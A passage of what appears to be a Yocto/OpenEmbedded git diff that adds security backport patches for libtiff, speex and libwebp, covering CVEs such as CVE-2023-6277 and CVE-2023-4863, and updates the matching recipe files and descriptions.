+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From dbb825a8312f30e63a06c272010967d51af5c35a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 21:30:58 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-4.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/dbb825a8312f30e63a06c272010967d51af5c35a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 54 +++++++++++++++++++++++++------------------
+ 1 file changed, 31 insertions(+), 23 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -5822,19 +5822,24 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripArray of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- _TIFFfree(data);
+- return (0);
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+@@ -5935,17 +5940,20 @@ static void allocChoppedUpStripArrays(TI
+ * size of StripByteCount and StripOffset tags is not greater than
+ * file size.
+ */
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
+- "Requested memory size for StripByteCount and "
+- "StripOffsets %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return;
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ if (allocsize > 100 * 1024 * 1024)
++ {
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
+ }
+
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
new file mode 100644
index 0000000000..01ed5dcd24
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
@@ -0,0 +1,28 @@
+From 561599c99f987dc32ae110370cfdd7df7975586b Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 5 Feb 2022 20:36:41 +0100
+Subject: [PATCH] TIFFReadDirectory(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0562
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 2bbc4585..23194ced 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -4126,7 +4126,8 @@
+ goto bad;
+ }
+
+- memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
++ if (old_extrasamples > 0)
++ memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
+ _TIFFsetShortArray(&tif->tif_dir.td_sampleinfo, new_sampleinfo, tif->tif_dir.td_extrasamples);
+ _TIFFfree(new_sampleinfo);
+ }
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
new file mode 100644
index 0000000000..71b85cac10
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
@@ -0,0 +1,212 @@
+From 87881e093691a35c60b91cafed058ba2dd5d9807 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 5 Dec 2021 14:37:46 +0100
+Subject: [PATCH] TIFFReadDirectory: fix OJPEG hack (fixes #319)
+
+to avoid having the size of the strip arrays inconsistent with the
+number of strips returned by TIFFNumberOfStrips(), which may cause
+out-ouf-bounds array read afterwards.
+
+One of the OJPEG hack that alters SamplesPerPixel may influence the
+number of strips. Hence compute tif_dir.td_nstrips only afterwards.
+
+CVE: CVE-2022-1354
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/87f580f39011109b3bb5f6eca13fac543a542798]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ libtiff/tif_dirread.c | 162 ++++++++++++++++++++++--------------------
+ 1 file changed, 83 insertions(+), 79 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 8f434ef5..14c031d1 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -3794,50 +3794,7 @@ TIFFReadDirectory(TIFF* tif)
+ MissingRequired(tif,"ImageLength");
+ goto bad;
+ }
+- /*
+- * Setup appropriate structures (by strip or by tile)
+- */
+- if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
+- tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
+- tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
+- tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
+- tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
+- tif->tif_flags &= ~TIFF_ISTILED;
+- } else {
+- tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
+- tif->tif_flags |= TIFF_ISTILED;
+- }
+- if (!tif->tif_dir.td_nstrips) {
+- TIFFErrorExt(tif->tif_clientdata, module,
+- "Cannot handle zero number of %s",
+- isTiled(tif) ? "tiles" : "strips");
+- goto bad;
+- }
+- tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
+- if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
+- tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
+- if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
+-#ifdef OJPEG_SUPPORT
+- if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
+- (isTiled(tif)==0) &&
+- (tif->tif_dir.td_nstrips==1)) {
+- /*
+- * XXX: OJPEG hack.
+- * If a) compression is OJPEG, b) it's not a tiled TIFF,
+- * and c) the number of strips is 1,
+- * then we tolerate the absence of stripoffsets tag,
+- * because, presumably, all required data is in the
+- * JpegInterchangeFormat stream.
+- */
+- TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
+- } else
+-#endif
+- {
+- MissingRequired(tif,
+- isTiled(tif) ? "TileOffsets" : "StripOffsets");
+- goto bad;
+- }
+- }
++
+ /*
+ * Second pass: extract other information.
+ */
+@@ -4042,41 +3999,6 @@ TIFFReadDirectory(TIFF* tif)
+ } /* -- if (!dp->tdir_ignore) */
+ } /* -- for-loop -- */
+
+- if( tif->tif_mode == O_RDWR &&
+- tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
+- {
+- /* Directory typically created with TIFFDeferStrileArrayWriting() */
+- TIFFSetupStrips(tif);
+- }
+- else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
+- {
+- if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
+- {
+- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
+- tif->tif_dir.td_nstrips,
+- &tif->tif_dir.td_stripoffset_p))
+- {
+- goto bad;
+- }
+- }
+- if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
+- {
+- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
+- tif->tif_dir.td_nstrips,
+- &tif->tif_dir.td_stripbytecount_p))
+- {
+- goto bad;
+- }
+- }
+- }
+-
+ /*
+ * OJPEG hack:
+ * - If a) compression is OJPEG, and b) photometric tag is missing,
+@@ -4147,6 +4069,88 @@ TIFFReadDirectory(TIFF* tif)
+ }
+ }
+
++ /*
++ * Setup appropriate structures (by strip or by tile)
++ * We do that only after the above OJPEG hack which alters SamplesPerPixel
++ * and thus influences the number of strips in the separate planarconfig.
++ */
++ if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
++ tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
++ tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
++ tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
++ tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
++ tif->tif_flags &= ~TIFF_ISTILED;
++ } else {
++ tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
++ tif->tif_flags |= TIFF_ISTILED;
++ }
++ if (!tif->tif_dir.td_nstrips) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Cannot handle zero number of %s",
++ isTiled(tif) ? "tiles" : "strips");
++ goto bad;
++ }
++ tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
++ if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
++ tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
++ if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
++#ifdef OJPEG_SUPPORT
++ if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
++ (isTiled(tif)==0) &&
++ (tif->tif_dir.td_nstrips==1)) {
++ /*
++ * XXX: OJPEG hack.
++ * If a) compression is OJPEG, b) it's not a tiled TIFF,
++ * and c) the number of strips is 1,
++ * then we tolerate the absence of stripoffsets tag,
++ * because, presumably, all required data is in the
++ * JpegInterchangeFormat stream.
++ */
++ TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
++ } else
++#endif
++ {
++ MissingRequired(tif,
++ isTiled(tif) ? "TileOffsets" : "StripOffsets");
++ goto bad;
++ }
++ }
++
++ if( tif->tif_mode == O_RDWR &&
++ tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
++ {
++ /* Directory typically created with TIFFDeferStrileArrayWriting() */
++ TIFFSetupStrips(tif);
++ }
++ else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
++ {
++ if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
++ {
++ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
++ tif->tif_dir.td_nstrips,
++ &tif->tif_dir.td_stripoffset_p))
++ {
++ goto bad;
++ }
++ }
++ if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
++ {
++ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
++ tif->tif_dir.td_nstrips,
++ &tif->tif_dir.td_stripbytecount_p))
++ {
++ goto bad;
++ }
++ }
++ }
++
+ /*
+ * Make sure all non-color channels are extrasamples.
+ * If it's not the case, define them as such.
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
new file mode 100644
index 0000000000..e59f5aad55
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
@@ -0,0 +1,62 @@
+From fb1db384959698edd6caeea84e28253d272a0f96 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 2 Apr 2022 22:33:31 +0200
+Subject: [PATCH] tiffcp: avoid buffer overflow in "mode" string (fixes #400)
+
+CVE: CVE-2022-1355
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/c1ae29f9ebacd29b7c3e0c7db671af7db3584bc2]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ tools/tiffcp.c | 25 ++++++++++++++++++++-----
+ 1 file changed, 20 insertions(+), 5 deletions(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index fd129bb7..8d944ff6 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -274,19 +274,34 @@ main(int argc, char* argv[])
+ deftilewidth = atoi(optarg);
+ break;
+ case 'B':
+- *mp++ = 'b'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'b'; *mp = '\0';
++ }
+ break;
+ case 'L':
+- *mp++ = 'l'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'l'; *mp = '\0';
++ }
+ break;
+ case 'M':
+- *mp++ = 'm'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'm'; *mp = '\0';
++ }
+ break;
+ case 'C':
+- *mp++ = 'c'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'c'; *mp = '\0';
++ }
+ break;
+ case '8':
+- *mp++ = '8'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode)-1))
++ {
++ *mp++ = '8'; *mp = '\0';
++ }
+ break;
+ case 'x':
+ pageInSeq = 1;
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
new file mode 100644
index 0000000000..fc5d0ab5f4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
@@ -0,0 +1,30 @@
+From eecb0712f4c3a5b449f70c57988260a667ddbdef Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 6 Feb 2022 13:08:38 +0100
+Subject: [PATCH] TIFFFetchStripThing(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0561
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 23194ced..50ebf8ac 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5683,8 +5682,9 @@
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(resizeddata,data,(uint32)dir->tdir_count*sizeof(uint64));
+- _TIFFmemset(resizeddata+(uint32)dir->tdir_count,0,(nstrips-(uint32)dir->tdir_count)*sizeof(uint64));
++ if( dir->tdir_count )
++ _TIFFmemcpy(resizeddata,data, (uint32)dir->tdir_count * sizeof(uint64));
++ _TIFFmemset(resizeddata+(uint32)dir->tdir_count, 0, (nstrips - (uint32)dir->tdir_count) * sizeof(uint64));
+ _TIFFfree(data);
+ data=resizeddata;
+ }
diff --git a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
index 1f92c18513..7efaba3a38 100644
--- a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
+++ b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
@@ -1,10 +1,59 @@
SUMMARY = "Provides support for the Tag Image File Format (TIFF)"
+DESCRIPTION = "Library provides support for the Tag Image File Format \
+(TIFF), a widely used format for storing image data. This library \
+provide means to easily access and create TIFF image files."
+HOMEPAGE = "http://www.libtiff.org/"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=34da3db46fab7501992f9615d7e158cf"
CVE_PRODUCT = "libtiff"
SRC_URI = "http://download.osgeo.org/libtiff/tiff-${PV}.tar.gz \
+ file://CVE-2020-35523.patch \
+ file://CVE-2020-35524-1.patch \
+ file://CVE-2020-35524-2.patch \
+ file://001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch \
+ file://561599c99f987dc32ae110370cfdd7df7975586b.patch \
+ file://eecb0712f4c3a5b449f70c57988260a667ddbdef.patch \
+ file://CVE-2022-0865.patch \
+ file://CVE-2022-0908.patch \
+ file://CVE-2022-0907.patch \
+ file://CVE-2022-0909.patch \
+ file://CVE-2022-0891.patch \
+ file://CVE-2022-0924.patch \
+ file://CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch \
+ file://CVE-2022-34526.patch \
+ file://CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch \
+ file://CVE-2022-1354.patch \
+ file://CVE-2022-1355.patch \
+ file://CVE-2022-3570_3598.patch \
+ file://CVE-2022-3597_3626_3627.patch \
+ file://CVE-2022-3599.patch \
+ file://CVE-2022-3970.patch \
+ file://CVE-2022-48281.patch \
+ file://CVE-2023-0795_0796_0797_0798_0799.patch \
+ file://CVE-2023-0800_0801_0802_0803_0804.patch \
+ file://CVE-2023-1916.patch \
+ file://CVE-2023-25433.patch \
+ file://CVE-2023-25434-CVE-2023-25435.patch \
+ file://CVE-2023-26965.patch \
+ file://CVE-2023-26966.patch \
+ file://CVE-2023-2908.patch \
+ file://CVE-2023-3316.patch \
+ file://CVE-2023-3576.patch \
+ file://CVE-2023-3618.patch \
+ file://CVE-2023-40745.patch \
+ file://CVE-2023-41175.patch \
+ file://CVE-2022-40090.patch \
+ file://CVE-2023-6228.patch \
+ file://CVE-2023-6277-1.patch \
+ file://CVE-2023-6277-2.patch \
+ file://CVE-2023-6277-3.patch \
+ file://CVE-2023-6277-4.patch \
+ file://CVE-2023-52356.patch \
"
SRC_URI[md5sum] = "2165e7aba557463acc0664e71a3ed424"
SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d6775b8634"
@@ -12,6 +61,10 @@ SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d677
# exclude betas
UPSTREAM_CHECK_REGEX = "tiff-(?P<pver>\d+(\.\d+)+).tar"
+# Tested with check from https://security-tracker.debian.org/tracker/CVE-2015-7313
+# and 4.1.0 doesn't have the issue
+CVE_CHECK_WHITELIST += "CVE-2015-7313"
+
inherit autotools multilib_header
CACHED_CONFIGUREVARS = "ax_cv_check_gl_libgl=no"
diff --git a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
index 00ca3675ca..d603602584 100644
--- a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
+++ b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
@@ -1,5 +1,9 @@
SUMMARY = "Library and test program for decoding MPEG-2 and MPEG-1 video streams"
-HOMEPAGE = "http://libmpeg2.sourceforge.net/"
+DESCRIPTION = "mpeg2dec is a test program for libmpeg2. It decodes \
+mpeg-1 and mpeg-2 video streams, and also includes a demultiplexer \
+for mpeg-1 and mpeg-2 program streams. The main purpose of mpeg2dec \
+is to have a simple test bed for libmpeg2."
+HOMEPAGE = "https://libmpeg2.sourceforge.io/"
SECTION = "libs"
LICENSE = "GPLv2+"
LICENSE_FLAGS = "commercial"
diff --git a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
index c7f3e67022..317983edb2 100644
--- a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
+++ b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
@@ -1,4 +1,6 @@
SUMMARY = "Sound server for Linux and Unix-like operating systems"
+DESCRIPTION = "A general purpose sound server intended to run as a middleware \
+between your applications and your hardware devices, either using ALSA or OSS."
HOMEPAGE = "http://www.pulseaudio.org"
AUTHOR = "Lennart Poettering"
SECTION = "libs/multimedia"
@@ -137,11 +139,6 @@ EXTRA_OECONF_append_armeb = "${@bb.utils.contains("TUNE_FEATURES", "neon", "", "
export TARGET_PFPU = "${TARGET_FPU}"
-# TODO: Use more fine granular version
-#OE_LT_RPATH_ALLOW=":${libdir}/pulse-0.9:"
-OE_LT_RPATH_ALLOW = "any"
-OE_LT_RPATH_ALLOW[export]="1"
-
set_cfg_value () {
sed -i -e "s/\(; *\)\?$2 =.*/$2 = $3/" "$1"
if ! grep -q "^$2 = $3\$" "$1"; then
diff --git a/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
new file mode 100644
index 0000000000..eb16e95ffc
--- /dev/null
+++ b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
@@ -0,0 +1,30 @@
+Backport patch to fix CVE-2020-23903.
+
+CVE: CVE-2020-23903
+Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001
+From: Tristan Matthews <tmatth@videolan.org>
+Date: Mon, 13 Jul 2020 23:25:03 -0400
+Subject: [PATCH] wav_io: guard against invalid channel numbers
+
+Fixes #13
+---
+ src/wav_io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/wav_io.c b/src/wav_io.c
+index b5183015..09d62eb0 100644
+--- a/src/wav_io.c
++++ b/src/wav_io.c
+@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32
+ stmp = le_short(stmp);
+ *channels = stmp;
+
+- if (stmp>2)
++ if (stmp>2 || stmp<1)
+ {
+ fprintf (stderr, "Only mono and (intensity) stereo supported\n");
+ return -1;
diff --git a/meta/recipes-multimedia/speex/speex_1.2.0.bb b/meta/recipes-multimedia/speex/speex_1.2.0.bb
index 3a0911d6f8..ea475f0f1b 100644
--- a/meta/recipes-multimedia/speex/speex_1.2.0.bb
+++ b/meta/recipes-multimedia/speex/speex_1.2.0.bb
@@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \
file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50"
DEPENDS = "libogg speexdsp"
-SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz"
+SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \
+ file://CVE-2020-23903.patch \
+ "
UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar"
SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c"
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
new file mode 100644
index 0000000000..d293ab93ab
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
@@ -0,0 +1,55 @@
+From a486d800b60d0af4cc0836bf7ed8f21e12974129 Mon Sep 17 00:00:00 2001
+From: James Zern <jzern@google.com>
+Date: Wed, 22 Feb 2023 22:15:47 -0800
+Subject: [PATCH] EncodeAlphaInternal: clear result->bw on error
+
+This avoids a double free should the function fail prior to
+VP8BitWriterInit() and a previous trial result's buffer carried over.
+Previously in ApplyFiltersAndEncode() trial.bw (with a previous
+iteration's buffer) would be freed, followed by best.bw pointing to the
+same buffer.
+
+Since:
+187d379d add a fallback to ALPHA_NO_COMPRESSION
+
+In addition, check the return value of VP8BitWriterInit() in this
+function.
+
+Bug: webp:603
+Change-Id: Ic258381ee26c8c16bc211d157c8153831c8c6910
+
+CVE: CVE-2023-1999
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/a486d800b60d0af4cc0836bf7ed8f21e12974129]
+Signed-off-by: Nikhil R <nikhil.r@kpit.com>
+---
+ src/enc/alpha_enc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/enc/alpha_enc.c b/src/enc/alpha_enc.c
+index f7c02690e3..7d205586fe 100644
+--- a/src/enc/alpha_enc.c
++++ b/src/enc/alpha_enc.c
+@@ -13,6 +13,7 @@
+
+ #include <assert.h>
+ #include <stdlib.h>
++#include <string.h>
+
+ #include "src/enc/vp8i_enc.h"
+ #include "src/dsp/dsp.h"
+@@ -148,6 +149,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ }
+ } else {
+ VP8LBitWriterWipeOut(&tmp_bw);
++ memset(&result->bw, 0, sizeof(result->bw));
+ return 0;
+ }
+ }
+@@ -162,7 +164,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ header = method | (filter << 2);
+ if (reduce_levels) header |= ALPHA_PREPROCESSED_LEVELS << 4;
+
+- VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size);
++ if (!VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size)) ok = 0;
+ ok = ok && VP8BitWriterAppend(&result->bw, &header, ALPHA_HEADER_LEN);
+ ok = ok && VP8BitWriterAppend(&result->bw, output, output_size);
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
new file mode 100644
index 0000000000..419b12f7d9
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
@@ -0,0 +1,366 @@
+From 902bc9190331343b2017211debcec8d2ab87e17a Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Thu, 7 Sep 2023 21:16:03 +0200
+Subject: [PATCH 1/2] Fix OOB write in BuildHuffmanTable.
+
+First, BuildHuffmanTable is called to check if the data is valid.
+If it is and the table is not big enough, more memory is allocated.
+
+This will make sure that valid (but unoptimized because of unbalanced
+codes) streams are still decodable.
+
+Bug: chromium:1479274
+Change-Id: I31c36dbf3aa78d35ecf38706b50464fd3d375741
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/902bc9190331343b2017211debcec8d2ab87e17a]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 46 ++++++++++---------
+ src/dec/vp8li_dec.h | 2 +-
+ src/utils/huffman_utils.c | 97 +++++++++++++++++++++++++++++++--------
+ src/utils/huffman_utils.h | 27 +++++++++--
+ 4 files changed, 129 insertions(+), 43 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 93615d4..0d38314 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -253,11 +253,11 @@ static int ReadHuffmanCodeLengths(
+ int symbol;
+ int max_symbol;
+ int prev_code_len = DEFAULT_CODE_LENGTH;
+- HuffmanCode table[1 << LENGTHS_TABLE_BITS];
++ HuffmanTables tables;
+
